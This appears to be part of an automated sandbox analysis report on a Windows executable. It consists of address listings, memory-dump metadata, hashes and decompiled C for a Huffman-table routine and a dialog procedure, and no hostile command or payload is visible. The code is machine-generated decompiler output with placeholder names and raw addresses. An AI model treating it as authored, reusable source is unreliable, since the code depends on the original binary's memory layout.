                                                                      0x00405f4f
                                                                      0x00405f55
                                                                      0x00405f58
                                                                      0x00405f5b
                                                                      0x00000000
                                                                      0x00405f5b
                                                                      0x00405e1f
                                                                      0x00405e1f
                                                                      0x00405e20
                                                                      0x00405e78
                                                                      0x00405e78
                                                                      0x00405e7f
                                                                      0x00405f25
                                                                      0x00405f25
                                                                      0x00405f2a
                                                                      0x00405f2d
                                                                      0x00405f32
                                                                      0x00405f35
                                                                      0x00405f3a
                                                                      0x00405f3d
                                                                      0x00405f42
                                                                      0x00405f45
                                                                      0x00405f45
                                                                      0x00000000
                                                                      0x00405e85
                                                                      0x00405e85
                                                                      0x00405e85
                                                                      0x00405e85
                                                                      0x00405e89
                                                                      0x00405e89
                                                                      0x00405eab
                                                                      0x00405eae
                                                                      0x00405eb0
                                                                      0x00405eb3
                                                                      0x00405eb8
                                                                      0x00405e8e
                                                                      0x00405e8e
                                                                      0x00405e93
                                                                      0x00405e95
                                                                      0x00405e97
                                                                      0x00405e9c
                                                                      0x00405ea2
                                                                      0x00405ea7
                                                                      0x00405ea9
                                                                      0x00405ea9
                                                                      0x00405e9e
                                                                      0x00405e9e
                                                                      0x00405e9e
                                                                      0x00405e9c
                                                                      0x00000000
                                                                      0x00405eba
                                                                      0x00405ee7
                                                                      0x00405eec
                                                                      0x00405eee
                                                                      0x00405eef
                                                                      0x00405ef1
                                                                      0x00405ef2
                                                                      0x00405ef2
                                                                      0x00405ef2
                                                                      0x00405f1a
                                                                      0x00405f1f
                                                                      0x00405f1f
                                                                      0x00000000
                                                                      0x00405f1f
                                                                      0x00405eb8
                                                                      0x00405e7f
                                                                      0x00405e22
                                                                      0x00405e22
                                                                      0x00405e23
                                                                      0x00405e6d
                                                                      0x00000000
                                                                      0x00405e6d
                                                                      0x00405e25
                                                                      0x00405e26
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f82
                                                                      0x00405f82
                                                                      0x00405f82
                                                                      0x00405f85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f62
                                                                      0x00405f62
                                                                      0x00405f66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f6c
                                                                      0x00405f6c
                                                                      0x00405f6f
                                                                      0x00405f72
                                                                      0x00405f77
                                                                      0x00405f79
                                                                      0x00405f7c
                                                                      0x00405f7f
                                                                      0x00405f7f
                                                                      0x00405f7f
                                                                      0x00405f87
                                                                      0x00405f87
                                                                      0x00405f8a
                                                                      0x00405f8c
                                                                      0x00405f91
                                                                      0x00405f94
                                                                      0x00405f96
                                                                      0x00405f99
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f9f
                                                                      0x00405f9f
                                                                      0x00405fa1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405fa7
                                                                      0x00405fa7
                                                                      0x00405fab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405fb1
                                                                      0x00405fb1
                                                                      0x00405fb4
                                                                      0x00405fb6
                                                                      0x00406054
                                                                      0x00406054
                                                                      0x00406057
                                                                      0x00406059
                                                                      0x00406059
                                                                      0x0040605c
                                                                      0x0040605f
                                                                      0x00406061
                                                                      0x00406063
                                                                      0x00406065
                                                                      0x00406065
                                                                      0x0040606e
                                                                      0x00406073
                                                                      0x00406076
                                                                      0x00406079
                                                                      0x0040607c
                                                                      0x0040607f
                                                                      0x0040607f
                                                                      0x0040607f
                                                                      0x00406082
                                                                      0x00406088
                                                                      0x00406088
                                                                      0x0040608e
                                                                      0x0040608e
                                                                      0x0040608e
                                                                      0x00000000
                                                                      0x00406082
                                                                      0x00405fbc
                                                                      0x00405fbc
                                                                      0x00405fc2
                                                                      0x00405fc5
                                                                      0x00405fc7
                                                                      0x00405ff2
                                                                      0x00405ff5
                                                                      0x00405ffb
                                                                      0x00406000
                                                                      0x00406006
                                                                      0x0040600c
                                                                      0x0040600e
                                                                      0x00406011
                                                                      0x0040601a
                                                                      0x00406020
                                                                      0x00406020
                                                                      0x00406013
                                                                      0x00406015
                                                                      0x00406017
                                                                      0x00406017
                                                                      0x00406022
                                                                      0x00406028
                                                                      0x0040602b
                                                                      0x0040602d
                                                                      0x0040602f
                                                                      0x00406035
                                                                      0x00406037
                                                                      0x00406039
                                                                      0x0040603c
                                                                      0x00406045
                                                                      0x00406045
                                                                      0x00406047
                                                                      0x0040603e
                                                                      0x0040603e
                                                                      0x00406041
                                                                      0x00406041
                                                                      0x00406049
                                                                      0x00406049
                                                                      0x00406037
                                                                      0x0040604c
                                                                      0x0040604e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040604e
                                                                      0x00405fc9
                                                                      0x00405fc9
                                                                      0x00405fcf
                                                                      0x00405fd5
                                                                      0x00405fd7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405fd9
                                                                      0x00405fd9
                                                                      0x00405fdb
                                                                      0x00405fdd
                                                                      0x00405fe0
                                                                      0x00405fe7
                                                                      0x00405fe7
                                                                      0x00405fe9
                                                                      0x00405fe2
                                                                      0x00405fe2
                                                                      0x00405fe4
                                                                      0x00405fe4
                                                                      0x00405feb
                                                                      0x00405fed
                                                                      0x00405ff0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004060f4
                                                                      0x004060f7
                                                                      0x004060fa
                                                                      0x00406100
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062d7
                                                                      0x004062d7
                                                                      0x004062d7
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062df
                                                                      0x004062e2
                                                                      0x004062e8
                                                                      0x004062ef
                                                                      0x004062f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061c5
                                                                      0x004061c5
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061ef
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061cd
                                                                      0x004061cd
                                                                      0x004061d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061d7
                                                                      0x004061d7
                                                                      0x004061da
                                                                      0x004061dd
                                                                      0x004061e0
                                                                      0x004061e2
                                                                      0x004061e4
                                                                      0x004061e7
                                                                      0x004061ea
                                                                      0x004061ea
                                                                      0x004061ea
                                                                      0x004061f1
                                                                      0x004061f1
                                                                      0x004061f9
                                                                      0x004061fc
                                                                      0x00406202
                                                                      0x00406205
                                                                      0x00406209
                                                                      0x0040620d
                                                                      0x00406210
                                                                      0x00406213
                                                                      0x0040622b
                                                                      0x0040622b
                                                                      0x0040622e
                                                                      0x0040623c
                                                                      0x0040623f
                                                                      0x00406230
                                                                      0x00406230
                                                                      0x00406232
                                                                      0x00406239
                                                                      0x00406239
                                                                      0x00406268
                                                                      0x00406268
                                                                      0x00406268
                                                                      0x0040626b
                                                                      0x0040626d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406248
                                                                      0x00406248
                                                                      0x0040624c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406252
                                                                      0x00406252
                                                                      0x00406255
                                                                      0x00406258
                                                                      0x0040625b
                                                                      0x0040625d
                                                                      0x0040625f
                                                                      0x00406262
                                                                      0x00406265
                                                                      0x00406265
                                                                      0x00406265
                                                                      0x0040626f
                                                                      0x0040626f
                                                                      0x00406271
                                                                      0x00406273
                                                                      0x0040627e
                                                                      0x00406281
                                                                      0x00406284
                                                                      0x00406286
                                                                      0x00406288
                                                                      0x0040628a
                                                                      0x0040628d
                                                                      0x00406290
                                                                      0x00406295
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x0040629e
                                                                      0x004062a5
                                                                      0x004062a8
                                                                      0x004062aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b0
                                                                      0x004062b0
                                                                      0x004062b4
                                                                      0x004062c5
                                                                      0x004062c5
                                                                      0x004062c5
                                                                      0x004062c7
                                                                      0x004062c7
                                                                      0x004062cb
                                                                      0x004062cb
                                                                      0x004062cb
                                                                      0x004062cd
                                                                      0x004062ce
                                                                      0x004062d1
                                                                      0x004062d1
                                                                      0x004062d1
                                                                      0x004062d4
                                                                      0x00000000
                                                                      0x004062d4
                                                                      0x004062b6
                                                                      0x004062b6
                                                                      0x004062b9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062bf
                                                                      0x004062bf
                                                                      0x00000000
                                                                      0x004062bf
                                                                      0x00406215
                                                                      0x00406215
                                                                      0x00406217
                                                                      0x00406219
                                                                      0x0040621c
                                                                      0x0040621f
                                                                      0x00406223
                                                                      0x00406223
                                                                      0x004062f7
                                                                      0x004062f7
                                                                      0x004062fa
                                                                      0x00406301
                                                                      0x00406305
                                                                      0x00406307
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406312
                                                                      0x00406315
                                                                      0x00406317
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x00406326
                                                                      0x00406329
                                                                      0x00406340
                                                                      0x00406345
                                                                      0x0040634c
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406357
                                                                      0x00406357
                                                                      0x00406357
                                                                      0x0040635a
                                                                      0x0040635c
                                                                      0x00000000
                                                                      0x00406362
                                                                      0x00406362
                                                                      0x00406366
                                                                      0x00406371
                                                                      0x00406384
                                                                      0x00406389
                                                                      0x0040638e
                                                                      0x00406390
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406396
                                                                      0x00406396
                                                                      0x00406399
                                                                      0x0040639b
                                                                      0x004063a9
                                                                      0x004063a9
                                                                      0x004063ac
                                                                      0x004063ac
                                                                      0x004063af
                                                                      0x004063b2
                                                                      0x004063b5
                                                                      0x004063b8
                                                                      0x004063bb
                                                                      0x004063be
                                                                      0x00000000
                                                                      0x004063be
                                                                      0x0040639d
                                                                      0x0040639d
                                                                      0x004063a3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063a3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406742
                                                                      0x00406742
                                                                      0x00406748
                                                                      0x0040674e
                                                                      0x00406753
                                                                      0x00406759
                                                                      0x0040675f
                                                                      0x00406761
                                                                      0x00406764
                                                                      0x0040676d
                                                                      0x00406773
                                                                      0x00406773
                                                                      0x00406766
                                                                      0x00406768
                                                                      0x0040676a
                                                                      0x0040676a
                                                                      0x00406775
                                                                      0x00406777
                                                                      0x0040677a
                                                                      0x004067b5
                                                                      0x004067b5
                                                                      0x00000000
                                                                      0x0040677c
                                                                      0x0040677c
                                                                      0x0040677c
                                                                      0x00406782
                                                                      0x00406785
                                                                      0x00406787
                                                                      0x004067bc
                                                                      0x004067be
                                                                      0x00000000
                                                                      0x004067be
                                                                      0x00000000
                                                                      0x00406787
                                                                      0x00000000
                                                                      0x00405dc6
                                                                      0x00406794
                                                                      0x00000000
                                                                      0x00406794
                                                                      0x004061a8
                                                                      0x004061aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061ac
                                                                      0x004061ac
                                                                      0x004061af
                                                                      0x00000000
                                                                      0x004061af
                                                                      0x004060f4
                                                                      0x004060b5
                                                                      0x00406799
                                                                      0x0040679c
                                                                      0x0040679e
                                                                      0x004067a7
                                                                      0x004067ad
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: daefd34fde6f7fbed07744c6e647a958739c940e8bac480179e92ab9af4e1f14
                                                                      • Instruction ID: 6a2a399bce8cba23a38b40336a25ef91a896ee0b2f23fbec5292fe6e09a77363
                                                                      • Opcode Fuzzy Hash: daefd34fde6f7fbed07744c6e647a958739c940e8bac480179e92ab9af4e1f14
                                                                      • Instruction Fuzzy Hash: FEE17971900B09DFDB24CF59D880BAEBBF1EB44305F15892EE996A72C1D338AA51CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040686C, Relevance: .3, Instructions: 300COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040686C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d2a0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d2a0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d2a0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                      0x00406877
                                                                      0x0040687f
                                                                      0x00406883
                                                                      0x00406885
                                                                      0x00406888
                                                                      0x0040688a
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406893
                                                                      0x00406895
                                                                      0x00406895
                                                                      0x0040689b
                                                                      0x004068b0
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068bc
                                                                      0x004068bf
                                                                      0x004068c0
                                                                      0x004068c0
                                                                      0x004068c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068c8
                                                                      0x004068cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068cb
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d4
                                                                      0x004068d4
                                                                      0x004068d7
                                                                      0x004068dd
                                                                      0x004068de
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068de
                                                                      0x004068e3
                                                                      0x004068e6
                                                                      0x004068e8
                                                                      0x004068e8
                                                                      0x004068ee
                                                                      0x004068f0
                                                                      0x00406901
                                                                      0x004068f4
                                                                      0x004068f8
                                                                      0x00406b9d
                                                                      0x00000000
                                                                      0x00406b9d
                                                                      0x004068fe
                                                                      0x004068ff
                                                                      0x004068ff
                                                                      0x00406907
                                                                      0x0040690a
                                                                      0x0040690e
                                                                      0x00406910
                                                                      0x00406912
                                                                      0x00406915
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040691d
                                                                      0x00406923
                                                                      0x00406925
                                                                      0x00406927
                                                                      0x00406928
                                                                      0x0040693d
                                                                      0x0040693d
                                                                      0x00406940
                                                                      0x00406942
                                                                      0x00406942
                                                                      0x00406944
                                                                      0x00406949
                                                                      0x0040694b
                                                                      0x00406952
                                                                      0x00406954
                                                                      0x0040695c
                                                                      0x0040695c
                                                                      0x0040695e
                                                                      0x0040695f
                                                                      0x0040696e
                                                                      0x00406972
                                                                      0x00406976
                                                                      0x00406979
                                                                      0x0040697c
                                                                      0x00406981
                                                                      0x00406984
                                                                      0x0040698a
                                                                      0x00406991
                                                                      0x00406997
                                                                      0x00406b90
                                                                      0x00406b90
                                                                      0x00406b95
                                                                      0x00406ba4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b95
                                                                      0x004069a4
                                                                      0x004069a7
                                                                      0x004069aa
                                                                      0x004069ad
                                                                      0x004069b1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069bc
                                                                      0x004069bf
                                                                      0x004069c0
                                                                      0x004069c2
                                                                      0x004069c8
                                                                      0x004069cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069d1
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069e1
                                                                      0x004069e3
                                                                      0x004069e3
                                                                      0x004069eb
                                                                      0x004069ef
                                                                      0x004069f4
                                                                      0x00406a19
                                                                      0x00406a1f
                                                                      0x00406a21
                                                                      0x00406a23
                                                                      0x00406a26
                                                                      0x00406a2f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f6
                                                                      0x004069f6
                                                                      0x004069ff
                                                                      0x00406a03
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a14
                                                                      0x00406a14
                                                                      0x00406a17
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a07
                                                                      0x00406a0a
                                                                      0x00406a0c
                                                                      0x00406a10
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a12
                                                                      0x00406a12
                                                                      0x00000000
                                                                      0x00406a14
                                                                      0x00406a38
                                                                      0x00406a3e
                                                                      0x00406a48
                                                                      0x00406a4a
                                                                      0x00406a4f
                                                                      0x00406a51
                                                                      0x00406a87
                                                                      0x00406a53
                                                                      0x00406a53
                                                                      0x00406a56
                                                                      0x00406a59
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a6d
                                                                      0x00406a78
                                                                      0x00406a7f
                                                                      0x00406a7f
                                                                      0x00406a89
                                                                      0x00406a8c
                                                                      0x00406a8e
                                                                      0x00406a94
                                                                      0x00406a94
                                                                      0x00406a9d
                                                                      0x00406aa0
                                                                      0x00406aa5
                                                                      0x00406ab4
                                                                      0x00406abc
                                                                      0x00406ac1
                                                                      0x00406ae5
                                                                      0x00406aed
                                                                      0x00406af1
                                                                      0x00406af7
                                                                      0x00406ac3
                                                                      0x00406ad1
                                                                      0x00406ad4
                                                                      0x00406ada
                                                                      0x00406ada
                                                                      0x00406afb
                                                                      0x00406ab6
                                                                      0x00406ab6
                                                                      0x00406ab6
                                                                      0x00406b0c
                                                                      0x00406b10
                                                                      0x00406b1c
                                                                      0x00406b17
                                                                      0x00406b1a
                                                                      0x00406b1a
                                                                      0x00406b24
                                                                      0x00406b29
                                                                      0x00406b31
                                                                      0x00406b2d
                                                                      0x00406b2f
                                                                      0x00406b2f
                                                                      0x00406b37
                                                                      0x00406b39
                                                                      0x00406b40
                                                                      0x00406b4a
                                                                      0x00406b54
                                                                      0x00406b70
                                                                      0x00406b74
                                                                      0x004069b9
                                                                      0x004069bf
                                                                      0x004069c0
                                                                      0x004069c2
                                                                      0x004069c8
                                                                      0x004069cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406b56
                                                                      0x00406b56
                                                                      0x00406b56
                                                                      0x00406b5b
                                                                      0x00406b64
                                                                      0x00406b6d
                                                                      0x00000000
                                                                      0x00406b6d
                                                                      0x00406b7a
                                                                      0x00406b7a
                                                                      0x00406b7d
                                                                      0x00406b84
                                                                      0x00406b87
                                                                      0x00000000
                                                                      0x004069aa
                                                                      0x0040692a
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x00406930
                                                                      0x00406933
                                                                      0x00406934
                                                                      0x00406934
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x004068a0
                                                                      0x004068a6
                                                                      0x00000000

                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                                                      • Instruction ID: 0e4a2dd50186a7358473a6e43bf553a04c5afd6639b348010b65f15c337817cd
                                                                      • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                                                      • Instruction Fuzzy Hash: 4EC15971A00259CBCF18DF68D4905EEB7B2FF89314F26826AD856BB380D734A951CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004038C7, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 77%
                                                                      			E004038C7(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x42a46c = _t33;
					if(_t135 == 0x110) {
						 *0x42f024 = _t117;
						 *0x42a480 = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429448 = _t89;
						E00403DAF(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x42e808);
						 *0x42e7ec = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x42a46c = 1;
					}
